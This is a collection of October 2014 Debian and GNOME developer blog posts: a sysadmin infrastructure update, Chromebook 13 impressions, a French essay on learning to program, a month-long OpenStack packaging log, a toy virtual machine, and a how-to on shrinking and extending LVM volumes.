The migration of all the user data and ACLs has been massive and I’ve been spending a lot of time reviewing the existing HBAC rules trying to spot possible errors or misconfigurations. If you happen to not being able to access a certain service as you were used to in the past, please get in contact with the Sysadmin Team. All the possible ways to contact us are available at https://wiki.gnome.org/Sysadmin/Contact.

What is missing still?

Now that the Foundation membership information has been moved to LDAP I’ll be looking at porting some of the existing membership scripts to it. What I managed to port already are welcome e-mails for new or existing members. (renewals)

Next step will be generating a membership page from LDAP (to populate http://www.gnome.org/foundation/membership) and all the your-membership-is-going-to-lapse e-mails that were being sent till today.

Other news – /home/users mount on master.gnome.org

You will notice that loggin in into master.gnome.org will result in your home directory being empty, don’t worry, you did not lose any of your files but master.gnome.org is now currently hosting your home directories itself. As you may have been aware of adding files to the public_html directory on master resulted in them appearing on your people.gnome.org/~userid space. That was unfortunately expected as both master and webapps2 (the machine serving people.gnome.org’s webspaces) were mounting the same GlusterFS share.

We wanted to prevent that behaviour to happen as we wanted to know who has access to what resource and where. From today master’s home directories will be there just as a temporary spot for your tarballs, just scp and use ftpadmin against them, that should be all you need from master. If you are interested in receiving or keeping using your people.gnome.org’s webspace please mail <accounts AT gnome DOT org> stating so.

Other news – a shiny and new error 500 page has been deployed

Thanks to Magdalen Berns (magpie) a new error 500 web page has been deployed on all the Apache istances we host. The page contains an iframe of status.gnome.org and will appear every single time the web server behind the service you are trying to reach will be unreachable for maintenance or other purposes. While I hope you won’t see the page that often you can still enjoy it at https://static.gnome.org/error-500/500.html. Make sure to whitelist status.gnome.org on your browser as it currently loads it without https. (as the service is currently hosted on OpenShift which provides us with a *.rhcloud.com wildcard certificate, which differs from the CN the browser would expect it to be)

Updates

UPDATE on status.gnome.org’s SSL certificate: the certificate has been provisioned and it should result in the 500’s page to be displayed correctly with no warnings from your browser.

UPDATE from Adam Young on Kerberos ports being closed on many DC’s firewalls:

The next version of upstream MIT Kerberos will have support for fetching a ticket via ports 443 and marshalling the request over HTTPS. We’ll need to run a proxy on the server side, but we should be able to make it work:

Read up here
http://adam.younglogic.com/2014/06/kerberos-firewalls

07 October, 2014 09:21AM by Andrea Veri

October 06, 2014

Julian Andres Klode

Acer Chromebook 13 (FHD): Initial impressions

Today, I received my Acer Chromebook 13, in the glorious FullHD variant with 4GB RAM. For those of you who don’t know it, the Acer Chromebook 13 is a 13.3 inch chromebook powered by a Tegra K1 cpu.

Chromebook

This version cannot be ordered currently, only pre-orders were shipped yesterday (at least here in Germany). I cannot even review it on Amazon (despite having it bought there), as they have not enabled reviews for it yet.

The device feels solidly built, and looks good. It comes in all-white matte plastic and is slightly reminiscent of the old white MacBooks. The keyboard is horrible, there’s no well defined pressure point. It feels like your typing on a pillow. The display is OK, an IPS would be a lot nicer to work with, though. Oh, and it could be brighter. I do not think that using it outside on a sunny day would be a good idea. The speakers are loud and clear compared to my ThinkPad X230.

The performance of the device is about acceptable (unfortunately, I do not have any comparison in this device class). Even when typing this blog post in the visual wordpress editor, I notice some sluggishness. Opening the app launcher or loading the new tab page while music is playing makes the music stop for or skip a few ms (20-50ms if I had to guess). Running a benchmark in parallel or browsing does not usually cause this stuttering, though.

There are still some bugs in Chrome OS:  Loading the Play Books library the first time resulted in some rendering issues. The “Browser” process always consumes at least 10% CPU, even when idling, with no page open; this might cause some of the sluggishness I mentioned above. Also watching Flash videos used more CPU than I expected given that it is hardware accelerated.

Finally, Netflix did not work out of the box, despite the Chromebook shipping with a special Netflix plugin. I always get some unexpected issue-type page. Setting the user agent to Chrome 38 from Windows, thus forcing the use of the EME video player instead of the Netflix plugin, makes it work.

I reported these software issues to Google via Alt+Shift+I. The issues appeared on the current version of the stable channel, 37.0.2062.120.

What’s next? I don’t know.


Filed under: Chromebook

06 October, 2014 06:01PM by Julian Andres Klode

A weekend with the Acer Chromebook 13 FHD (AKA nyan-big)

I spent the weekend using almost exclusively my Chromebook 13, on a single charge Saturday and Sunday.

Keyboard

I think I like the keyboard better now than I used to when I first tried it. It gets nowhere near the ThinkPad X230 one, though; appart from the coating, which my (backlit) X230 unfortunately does not have.

Screen

While the screen appeared very grainy to me on first sight, having only used IPS screens in the past year, I got used to it over the weekend. I now do not notice much graininess anymore. The contrast still seems extremely poor, the colors are not vivid, and the vertical viewing angles are still a disaster, though.

Battery life

I think the battery life is awesome. I have 30% remaining now while I am writing this blog post and Chrome OS tells me I still have 3 hours and 19 minutes remaining. It could probably still be improved though, I notice that Chrome OS uses 7-14% CPU in idle normally (and up to 20% in exceptional cases).

The maximum power usage I measured using the battery’s internal sensor was about 9.2W, that was with 5 Big Buck Bunny 1080p videos played in parallel. Average power consumption is around 3-5W (up to 6.5 with single video playing), depending on brightness, and use.

Performance

While I do notice a performance difference to my much more high-end Ivy Bridge Core i5 laptop, it turns out to be usable enough to not make me want to throw it at a wall. Things take a bit longer than I am used to, but it is still acceptable.

Input: Software Part

The user interface is great. There are a lot of gestures available for navigating between windows, tabs, and in the history. For example, horizontally swiping with two finger moves in history, three fingers moves between tabs; and swiping down (or up for Australian scrolling) gives an overview of all windows (like expose on Mac, GNOME’s activities, or the multi-tasking thing Maemo used to have).

What I miss is a keyboard shortcut like Meta + Left/Right on GNOME which moves the active window to the left/right side of the screen. That would be very useful for mult-tasking situations.

Issues

I noticed some performance issues. For example, I can easily get the Chromebook to use 85% of a CPU by scrolling on a page with the touchpad or 70% for scrolling by keeping a key pressed (crbug.com/420452).

While watching Big Buck Bunny on YouTube, I noticed some (micro) stuttering in the beginning of the film, as well as each time I move in or out of the video area when not in full-screen mode (crbug.com/420582). It also increases CPU usage to about 70%.

Running a “proper” Linux?

Today, I tried to play around a bit with Debian wheezy and Ubuntu trusty systems, in a chroot for now. I was trying to find out if I can get an accelerated X server with the standard ChromeOS kernel. The short answer is: No. I tried two things:

  1. Debian wheezy with the binaries from ChromeOS (they have the same xserver version)
  2. Ubuntu trusty with the Nvidia drivers

Unfortunately, they did not work. Option 1 failed because ChromeOS uses glibc 2.15 whereas wheezy uses 1.13. Option 2 failed because the sysfs interface is different between the ChromeOS and Linux4Tegra kernels.

I guess I’ll have to wait.

I also tried booting a custom kernel from USB, but given that the u-boot always sets console= and there is no non-verified u-boot available yet, I could not see any output on the screen :(  – Maybe I should build a u-boot myself?


Filed under: Chromebook

06 October, 2014 06:00PM by Julian Andres Klode

October 05, 2014

Stefano Zacchiroli

je code

je.code(); — promoting programming (in French)

jecode.org is a nice initiative by, among others, my fellow Debian developer and university professor Martin Quinson. The goal of jecode.org is to raise awareness about the importance of learning the basics of programming, for everyone in modern societies. jecode.org targets specifically francophone children (hence the name, for "I code").

I've been happy to contribute to the initiative with my thoughts on why learning to program is so important today, joining the happy bunch of "codeurs" on the web site. If you read French, you can find them reposted below. If you also write French, you might want to contribute your thoughts on the matter. How? By forking the project of course!


Pourquoi codes-tu ?

Tout d'abord, je code parce que c'est une activité passionnante, drôle, et qui permet de prouver le plaisir de créer.

Deuxièmement, je code pour automatiser les taches répétitives qui peuvent rendre pénibles nos vies numériques. Un ordinateur est conçu exactement pour cela: libérer les êtres humains des taches stupides, pour leur permettre de se concentrer sur les taches qui ont besoin de l'intelligence humaine pour être résolues.

Mais je code aussi pour le pur plaisir du hacking, i.e., trouver des utilisations originelles et inattendues pour des logiciels existants.

Comment as-tu appris ?

Complètement au hasard, quand j'étais gamin. À 7 ou 8 ans, je suis tombé dans la bibliothèque municipale de mon petit village, sur un livre qui enseignait à programmer en BASIC à travers la métaphore du jeu de l'oie. À partir de ce jour j'ai utilisé le Commodore 64 de mon père beaucoup plus pour programmer que pour les jeux vidéo: coder est tellement plus drôle!

Plus tard, au lycée, j'ai pu apprécier la programmation structurée et les avantages énormes qu'elle apporte par rapport aux GO TO du BASIC et je suis devenu un accro du Pascal. Le reste est venu avec l'université et la découverte du Logiciel Libre: la caverne d'Ali Baba du codeur curieux.

Quel est ton langage préféré ?

J'ai plusieurs langages préférés.

J'aime Python pour son minimalisme syntactique, sa communauté vaste et bien organisée, et pour l'abondance des outils et ressources dont il dispose. J'utilise Python pour le développement d'infrastructures (souvent équipées d'interfaces Web) de taille moyenne/grande, surtout si j'ai envie des créer une communauté de contributeurs autour du logiciel.

J'aime OCaml pour son système de types et sa capacité de capturer les bonnes propriétés des applications complexes. Cela permet au compilateur d'aider énormément les développeur à éviter des erreurs de codage comme de conception.

J'utilise aussi beaucoup Perl et le shell script (principalement Bash) pour l'automatisation des taches: la capacité de ces langages de connecter d'autres applications est encore inégalée.

Pourquoi chacun devrait-il apprendre à programmer ou être initié ?

On est de plus en plus dépendants des logiciels. Quand on utilise une lave-vaisselle, on conduit une voiture, on est soigné dans un hôpital, quand on communique sur un réseau social, ou on surfe le Web, nos activités sont constamment exécutées par des logiciels. Celui qui contrôle ces logiciels contrôle nos vies.

Comme citoyens d'un monde qui est de plus en plus numérique, pour ne pas devenir des esclaves 2.0, nous devons prétendre le contrôle sur le logiciel qui nous entoure. Pour y parvenir, le Logiciel Libre---qui nous permet d'utiliser, étudier, modifier, reproduire le logiciel sans restrictions---est un ingrédient indispensable. Aussi bien qu'une vaste diffusion des compétences en programmation: chaque bit de connaissance dans ce domaine nous rende tous plus libres.

05 October, 2014 02:48PM

hackergotchi for Thomas Goirand

Thomas Goirand

OpenStack packaging activity: September 2014

I decided I’d post this monthly. It may be a bit boring, sorry, but I think it’s a nice thing to have this public. The log starts on the 6th, because on the 4th I was back from Debconf (after a day in San Francisco, plus 20 hours of traveling and 15 hours of time gap). It is to be noted that every time something is uploaded in Debian for Icehouse (in Sid), or for Juno (in Experimental), there’s also a corresponding backport produced for Wheezy.

 

Saturday 6th & Sunday 7th:
– packaged libjs-twitter-bootstrap-wizard (in new queue)
– Uploaded python-pint after reviewing the debian/copyright
– Worked on updating python-eventlet in Experimental, and adding Python3 support. It seems Python3 support isn’t ready yet, so I will probably remove that feature from the package update.
– Tried to apply the Django 1.7 patches for python-django-bootstrap-form. They didn’t work, but Raphael came back on Monday morning with new versions
of the patches, which should be good this time.
– Helped the DSA (Debian System Administrators) with the Debian OpenStack cloud. It’s looking good and working now (note: I helped them during Debconf 14).
– Started a page about adding more tasksel tasks: https://wiki.debian.org/tasksel/MoreTasks. It’s looking like Joey Hess is adding new tasks by default in Tasksel, with “OpenStack compute node” and “OpenStack proxy node”. It will be nice to have them in the default Debian installer! :)
– Packaged and uploaded python-dib-utils, now in NEW queue.

Monday 8th:
– Uploaded fixed python-django-bootstrap-form with patch for Django 1.7.
– Packaged and uploaded python-pysaml2.
– Finilized and uploaded python-jingo which is needed for python-django-compressor unit tests
– Finalized and uploaded python-coffin which is needed for python-django-compressor unit tests
– Worked on running the unit tests for python-django-compressor, as I needed to know if it could work with Django 1.7. It was hard to find the correct way to run the unit tests, but finally, they all passed. I will add the unit tests once coffin and jingo will be accepted in Sid.
– Applied patches in the Debian BTS for python-django-openstack-auth and Django 1.7. Uploaded the fixed package.
– Fixed python-django-pyscss compat with Django 1.7, uploaded the result.
– Updated keystone to Juno b3.
– Built Wheezy backports of some JS libs needed for Horizon in Juno, which I already uploaded to Sid last summer:
o libjs-twitter-bootstrap-datepicker
o libjs-jquery.quicksearch
o libjs-spin.js
– Upstreamed the Django 1.7 patch for python-django-openstack-auth:

https://review.openstack.org/119972

Tuesday 9:
– Updated and uploaded Swift 2.1.0. Added swift-object-expirer package to it, together with init script.

Wednesday 10:
Basically, cleaned the Debian BTS of almost all issues today… :P
– Added it.po update to nova (Closes: #758305).
– Backported libvirt 1.2.7 to Wheezy, to be able to close this bug: https://bugs.debian.org/757548 (eg: changed dependency from libvirt-bin to libvirt-daemon-system)
– Uploaded the fixed nova package using libvirt-daemon-system
– Upgraded python-trollius to 1.0.1
– Fixed tuskar-ui to work with Django 1.7. Disabled pep8 tests during build. Added build-conflicts: python-unittest2.
– Fixed python-django-compressor for Django 1.7, and now running unit tests with it, after python-coffin and python-jingo got approved in Sid by FTP masters.
– Fixed python-xstatic wrong upstream URLs.
– Added it.po debconf translation to Designate.
– Added de.po debconf translation to Tuskar.
– Fixed copyright holders in python-xstatic-rickshaw
– Added python-passlib as dependency for python-cinder.

Remaining 3 issues in the BTS: ceilometer FTBFS, Horizon unit test with Django 1.7, Designate fail to install. All of the 3 are harder to fix, and I may try to do so later this week.

Thursday 11:
– Fixed python-xstatic-angular and python-xstatic-angular-mock to deal with the new libjs-angularjs version (closes 2 Debian RC bugs: uninstallable).
– Fixed ceilometer FTBFS (Closes rc bug)

Friday 12:
– Fixed wrong copyright file for libjs-twitter-bootstrap-wizard after the FTP masters told me, and reuploaded to Sid.
– Reuploaded wrong upload of ceilometer (wrong hash for orig.tar.xz)
– Packaged and uploaded python-xstatic-bootstrap-scss
– Packaged and uploaded python-xstatic-font-awesome
– Packaged and uploaded ntpstat

Monday 15:
– packaged and uploaded python-xstatic-jquery.bootstrap.wizard
– Fixed python-xstatic-angular-cookies to use new libjs-angularjs version (fixed version dependencies)
– Fixed Ceilometer FTBFS (Closes: #759967)
– Backported all python-xtatic packages to Wheezy, including all dependencies. This includes backporting of a bunch of packages from nodejs which were needed as build-dependencies (around 70 packages…). Filed about 5 or 6 release critical bugs as some nodejs packages were not buildable as-is.
– Fixed some too restrictive python-xstatic-angular* dependencies on the libjs-angularjs (the libjs-angularjs increased version).

Tuesday 16:
– Uploaded updates to Experimental:
o python-eventlet 0.15.2 (this one took a long time as it needed maintenance)
o oslo-config
o python-oslo.i18n
– Uploaded to Sid:
o python-diskimage-builder 0.1.30-1
o python-django-pyscss 1.0.2-1
– Fixed horizon libapache-mode-wsgi to be a dependency of openstack-dashboard-apache and not just openstack-dashboard (in both Icehouse & Juno).
– Removed the last failing Django 1.7 unit test from Horizon. It doesn’t seem relevant anyway.
– Backported python-netaddr 0.7.12 to Wheezy (needed by oslo-config).
– Started working on oslo.rootwrap, though it failed to build in Wheezy with a unit test failure.

Wednesday 17:
– To experimental:
o Uploaded oslo.rootwrap 1.3.0.0~a1. It needed a build-depends on iproute2 because of a new test.
o Uploaded python-oslo.utils 0.3.0
o Uploaded python-oslo.vmware 0.6.0, fixed sphinx-build conf.py and filed a bug about it: https://bugs.launchpad.net/oslo.vmware/+bug/1370370 plus emailed the commiter of the issue (which appeared 2 weeks ago).
o Uploaded python-pycadf 0.6.0
o Uploaded python-pyghmi 0.6.17
o Uploaded python-oslotest 1.1.0.0~a2, including patch for Wheezy, which I also submited upstream: https://review.openstack.org/122171/
o Uploaded glanceclient 0.14.0, added a patch to not use the embedded version of urllib3 in requests: https://review.openstack.org/122184
– To Sid:
o Uploaded python-zake_0.1.6-1

Thesday 18:
– Backported zeromq3-4.0.4+dfs, pyzmq-14.3.1, pyasn1-0.1.7, python-pyasn1-modules-0.0.5
– Uploaded keystoneclient 0.10.1, fixed the saml2 unit tests which were broken using testtools >= 0.9.39. Filed bug, and warned code author: https://bugs.launchpad.net/python-keystoneclient/+bug/1371085
– Uploade swiftclient 2.3.0 to experimental.
– Uploaded ironicclient 0.2.1 to experimental.
– Uploaded saharaclient, filed bug with saharaclient expecting an up and running keystone server: https://bugs.launchpad.net/python-saharaclient/+bug/1371177

Friday 19:
– Uploaded keystone Juno b3, filed but about unit tests downloading with git, while no network access should be performed during package build (forbidden by
Debian policy)
– Uploaded python-oslo.db 1.0.0 which I forgot in the dependency list, and which was needed for Neutron.
– Uploaded nova 2014.2~b3-1 (added a new nova-serialproxy service daemon to the nova-consoleproxy)

Saturday 20:
– Uploaded Neutron Juno b3.
– Uploaded python-retrying 1.2.3 (was missing from depends upload)
– Uploaded Glance Juno b3.
– Uploaded Cinder Juno b3.
– Fixed python-xstatic-angular-mock which had a .pth packaged, as well as the data folder (uploaded debian release -3).
– Fixed missing depends and build-conflicts in python-xstatic-jquery.

Sunday 21:
– Dropped python-pil & python-django-discover-runner from runtime Depends: of python-django-pyscss, as it’s only needed for tests. It also created a conflicts, because python-django-discover-runner depends on python-unittest2 and horizon build-conflicts with it.
– Forward-ported the Django 1.7 patches for Horizon. Opened new patch: https://review.openstack.org/122992 (since the old fix has gone away after a refactor of the unit test).
– Uploaded Horizon Juno b3.
– Applied https://review.openstack.org/#/c/122768/ to the keystone package, so that it doesn’t do “git clone” of the keystoneclient during build.
– Uploaded oslo.messaging 1.4.0.0 (which really is 1.4.0) to experimental
– Uploaded oslo.messaging 1.4.0.0+really+1.3.1-1 to fix the issue in Sid/Jessie after the wrong upload (due to Zul wrong tagging of Keystone in the 2014.1.2 point release).

Monday 22:
– Uploaded ironic 2014.2~b3-1 to experimental
– Uploaded heat 2014.2~b3-1 (with some fixes for sphinx doc build)
– Uploaded ceilometer 2014.2~b3-1 to experimental
– Uploaded openstack-doc-tools 0.19-1 to experimental
– Uploaded openstack-trove 2014.2~b3-1 to experimental

Tuesday 23:
– Uploaded python-neutronclient with fixed version number for cliff and six. This missing requirement for cliff version produced an error in Trove, which I don’t want to happen again.
– Added fix for unit tests in Trove: https://review.openstack.org/#/c/123450/1,publish
– Uploaded oslo.messaging 1.4.1 in Experimental, fixing the version conflicts with the one in Sid/Jessie. Thanks to Doug Hellman for doing the tagging. I will need to upload new versions of the following packages with the >= 1.4.1 depends:
> – ceilometer
> – ironic
> – keystone
> – neutron
> – nova
> – oslo-config
> – oslo.rootwrap
> – oslo.i18n
> – python-pycadf
See http://lists.openstack.org/pipermail/openstack-dev/2014-September/046795.html for more explanation about the mess I’m repairing…
– Uploaded designate Juno b3.

Wednesday 24:
– Uploaded oslosphinx 2.2.0.0
– Uploaded update to django-openstack-auth (new last minute requirement for Horizon).
– Uploaded final oslo-config package version 1.4.0.0 (really is 1.4.0)
– Packaged and uploaded Sahara. This needs some tests by someone else as I don’t even know how it works.

Thuesday 25:
– Uploaded python-keystonemiddleware 1.0.0-3, fixing CVE-2014-7144] TLS cert verification option not honoured in paste configs. https://bugs.debian.org/762748
– Packaged and uploaded python-yaql, sent pull request for fixing print statements into Python3 compatible print function calls: https://github.com/ativelkov/yaql/pull/15
– Packaged and uploaded python-muranoclient.
– Started the packaging of Murano (not finished yet).
– Uploaded python-keystoneclient 0.10.1-2 with the CVE-2014-7144 fix to Sid, with urgency=high. Uploaded 0.11.1-1 to Experimental.
– Uploaded python-keystonemiddleware fix for CVE-2014-7144.
– Uploaded openstack-trove 2014.2~b3-3 with last unit test fix from https://review.openstack.org/#/c/123450/

Friday 26:
– Uploaded a fix for murano-agent, which makes it run as root.
– Finished the packaging of Murano
– Started packaging murano-dashboard, sent this patch to fix the wrong usage of the /usr/bin/coverage command: https://review.openstack.org/124444
– Fixed wrong BASE_DIR in python-xstatic-angular and python-xstatic-angular-mock

Saturday 27:
– uploaded python-xstatic-boostrap-scss which I forgot to upload… :(
– uploaded python-pyscss 1.2.1

Sunday 28:
– After a long investigation, I found out that the issue when installing the openstack-dasboard package was due to a wrong patch I did for Python 3.2 in Wheezy in python-pyscss. Corrected the patch from version 1.2.1-1, and uploaded version 1.2.1-2, the dashboard now installs correctly. \o/
– Did a new version of an Horizon patch at https://review.openstack.org/122992/ to address Django 1.7 compat.

Monday 29:
– Uploaded new version of python-pyscss fixing the last issue with Python 3 (there was a release critical bug on it).
– Uploaded fixup for python-django-openstack-auth fail to build in the Sid version, which was broken since the last upload of keystoneclient (which makes some of its API now as private).
– Uploaded python-glance-store 0.1.8, including Ubuntu patch to fix unit tests.
– Reviewed the packaging of python-strict-rfc3339 (see https://bugs.debian.org761152).
– Uploaded Sheepdog with fix in the init script to start after corosync (Closes: #759216).
– Uploaded pt_BR.po Brazilian Portuguese debconf templates translation for nova Icehouse in Sid (only commited it in Git for Juno).
– Same for Glance.

Tuesday 30:
– Added Python3 support in python-django-appconf, uploaded to Sid
– Upgraded to python-django-pyscss 1.0.3, and fixed broken unit tests with this new release under Django 1.7. Created pull request: https://github.com/fusionbox/django-pyscss/pull/22
– Fixed designate requirements.txt in Sid (Icehouse) to allow SQLA 0.9.x. Uploaded resulting package to Sid.
– Uploaded new Debian fix for python-tooz: kills memcached only if the package scripts started it (plus cleans .testrepository on clean).
– Uploaded initial release of murano
– Uploaded python-retrying with patch from Ubuntu to remove embedded copy of six.py code.
– Uploaded python-oslo.i18n 1.0.0 to experimental (same as before, just bump of version #)
– Uploaded python-oslo.utils 1.0.0 to experimental (same as before, just bump of version #)
– Uploaded Keystone Juno RC1
– Uploaded Glance Juno RC1

05 October, 2014 08:41AM by admin

hackergotchi for Steve Kemp

Steve Kemp

Before I forget, a simple virtual machine

Before I forget I had meant to write about a toy virtual machine which I'ce been playing with.

It is register-based with ten registers, each of which can hold either a string or int, and there are enough instructions to make it fun to use.

I didn't go overboard and write a complete grammer, or a real compiler, but I did do enough that you can compile and execute obvious programs.

First compile from the source to the bytecodes:

$ ./compiler examples/loop.in

Mmm bytecodes are fun:

$ xxd  ./examples/loop.raw
0000000: 3001 1943 6f75 6e74 696e 6720 6672 6f6d  0..Counting from
0000010: 2074 656e 2074 6f20 7a65 726f 3101 0101   ten to zero1...
0000020: 0a00 0102 0100 2201 0102 0201 1226 0030  ......"......&.0
0000030: 0104 446f 6e65 3101 00                   ..Done1..

Now the compiled program can be executed:

$ ./simple-vm ./examples/loop.raw
[stdout] register R01 = Counting from ten to zero
[stdout] register R01 = 9 [Hex:0009]
[stdout] register R01 = 8 [Hex:0008]
[stdout] register R01 = 7 [Hex:0007]
[stdout] register R01 = 6 [Hex:0006]
[stdout] register R01 = 5 [Hex:0005]
[stdout] register R01 = 4 [Hex:0004]
[stdout] register R01 = 3 [Hex:0003]
[stdout] register R01 = 2 [Hex:0002]
[stdout] register R01 = 1 [Hex:0001]
[stdout] register R01 = 0 [Hex:0000]
[stdout] register R01 = Done

There could be more operations added, but I'm pleased with the general behaviour, and embedding is trivial. The only two things that make this even remotely interesting are:

  • Most toy virtual machines don't cope with labels and jumps. This does.
    • Even though it was a real pain to go patching up the offsets.
    • Having labels be callable before they're defined is pretty mandatory in practice.
  • Most toy virtual machines don't allow integers and strings to be stored in registers.
    • Now I've done that I'm not 100% sure its a good idea.

Anyway that concludes todays computer-fun.

05 October, 2014 08:34AM

hackergotchi for Vasudev Kamath

Vasudev Kamath

Note to Self: LVM Shrink Resize HowTo

Recently I had to reinstall a system at office with Debian Wheezy and I thought I should use this opportunity to experiment with LVM. Yeah I've not used LVM till date, even though I'm using Linux for more than 5 years now. I know many DD friends who use LVM with LUKS encryption and I always wanted to experiment, but since my laptop is only thing I've and its currently perfectly in shape I didn't dare to experiment it there. This reinstall was golden opportunity for me to experiment and learn something new.

I used Wheezy CD ISO downloaded using jigdo for installation. Now I will just go bit off topic and want to share the USB stick preparation. I have to say this because I had not done installation for quite a while now. Last I did was during Squeeze time so like usual I blindly executed following command.

cat debian-wheezy.iso > /dev/sdb

Surprisingly USB stick didn't boot! I was getting Corrupt or missing ISO.bin. So next I tried using dd for preparing.

dd if=debian-wheezy.iso of=/dev/sdb

Surprisingly this also didn't work and I get same error message as above. This is when I went back to debian manual and looked for installation step and there I found new way!

cp debian-wheezy.iso /dev/sdb

Look at destination, its a device and voilà this worked! This is something new I learnt and I'm surprised how easy it is now to prepare USB stick. But I still didn't get why first 2 methods failed!. If you guys know please do share.

Now coming back to LVM. I used default LVM when disk partitioning was asked, and I used guided partitioning method provided by debian-installer and ended up with following layout

$ lvs
  LV     VG        Attr     LSize  Pool Origin Data%  Move Log Copy%  Convert
home   system-disk -wi-ao-- 62.34g
root   system-disk -wi-ao--  9.31g
swap_1 system-disk -wi-ao--  2.64g

So guided partitioning of debian-installer allocates 10G for root and rest to home and swap. This is not a problem but when I started installing required software, I could see root running out of space quickly so I wanted to resize root and give it 10G more, for this I need to reduce the home by 10G for which I need to first unmount the home partition. Unmounting home from running system isn't possible so I booted into recovery assuming I can unmount home there but I couldn't. lsof didn't show any one using /home after searching a bit I found fuser command and it looks like kernel is using /home which is mounted by it.

$ fuser -vm /home
                     USER        PID ACCESS COMMAND
/home:               root     kernel mount /home

So it isn't possible to unmount /home in recovery mode also. Online materials told me to use live-cd for doing this but I didn't have patience to do that so I just went ahead commented /home mounting in /etc/fstab and rebooted!. This time it worked and /home is not mounted on recovery mode. Now comes the hard part resizing home, thanks to TLDP doc on reducing I coud do this with following step

# e2fsck -f /dev/volume-name/home
# resize2fs /dev/volume-name/home 52G
# lvreduce -L-10G /dev/volume-name/home

And now the next part live extending the root partition again thanks to TLDP doc on extending following command did it.

# lvextend -L+10G /dev/volume-name/root
# resize2fs /dev/volumne-name/root

And now important part! Uncomment /home line in /etc/fstab so it will be mounted normally in next boot and reboot! On login I can see my partitions updated.

# lvs
  LV     VG        Attr     LSize  Pool Origin Data%  Move Log Copy%  Convert
home   system-disk -wi-ao-- 52.34g
root   system-disk -wi-ao-- 19.31g
swap_1 system-disk -wi-ao--  2.64g

I've started liking LVM more now! :)

05 October, 2014 06:30AM by copyninja